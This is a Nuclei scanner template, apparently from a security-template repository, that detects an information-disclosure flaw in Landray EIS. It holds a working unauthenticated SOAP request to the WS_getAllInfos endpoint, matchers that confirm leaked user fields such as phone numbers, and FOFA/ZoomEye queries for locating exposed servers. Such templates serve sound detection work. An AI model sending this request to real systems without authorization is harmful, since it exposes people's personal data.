52 lines
1.5 KiB
YAML
52 lines
1.5 KiB
YAML
id: landray-eis-ws-infoleak
|
|
|
|
info:
|
|
name: Landray EIS WS_getAllInfos - Information Disclosure
|
|
author: Fur1na
|
|
severity: high
|
|
description: |
|
|
Landray EIS WS_getAllInfos interface suffers from a sensitive information disclosure vulnerability.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/CTLyriSSF-nQ8SUFv4RX0A
|
|
- https://github.com/akyosk/pocman/blob/main/cve/Lanling/Lanling_Info.py
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: app="Landray-EIS智慧协同平台"
|
|
zoomeye-query: app:"蓝凌EIS智慧协同平台"
|
|
tags: landray,eis,info-leak
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /WS/Basic/Basic.asmx HTTP/1.1
|
|
Content-Type: text/xml
|
|
Host: {{Hostname}}
|
|
|
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
|
|
<soapenv:Header/>
|
|
<soapenv:Body>
|
|
<tem:WS_getAllInfos/>
|
|
</soapenv:Body>
|
|
</soapenv:Envelope>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<?xml"
|
|
- "WS_getAllInfosResponse"
|
|
- "CELL_PHONE_NUMBER"
|
|
- "UNID"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "Content-Type: text/xml"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100af7dab2d7100054862f33ac2b4f1227eef14f612e49c0298b779411f29bfc00f02203a74b5f90676f4f90d6a321b4b30d0e2284d6064a992f459e2dfebca990c0147:922c64590222798bb761d5b6d8e72950 |